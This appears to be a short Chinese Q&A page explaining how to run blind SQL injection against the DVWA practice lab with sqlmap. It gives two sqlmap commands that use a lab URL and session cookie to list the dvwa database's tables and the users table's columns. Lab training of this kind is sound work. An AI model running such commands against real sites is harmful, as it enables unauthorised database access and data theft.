python的sql盲注dvwa
时间: 2023-11-25 21:42:05 浏览: 75
Python的SQL盲注是指通过构造特定的SQL语句来绕过应用程序的安全机制,并获取未经授权的数据。在DVWA漏洞测试环境中进行SQL盲注,可以使用sqlmap工具。下面是使用sqlmap进行DVWA的SQL盲注的步骤:
1. 首先,确保你已经安装了sqlmap工具并配置好环境。
2. 使用命令行进入到sqlmap工具所在的目录。
3. 输入以下命令,获取数据库dvwa的所有表:
```
python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --tables -D dvwa
```
4. 输入以下命令,获取数据库表users的所有列:
```
python sqlmap.py -u "http://192.168.101.66/bachang/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low;PHPSESSID=n2nqkt6qqt524ehqmae57srcu6" --columns -D dvwa -T users
```
通过以上步骤,你可以使用sqlmap工具进行DVWA的SQL盲注,获取数据库表和列的信息。
阅读全文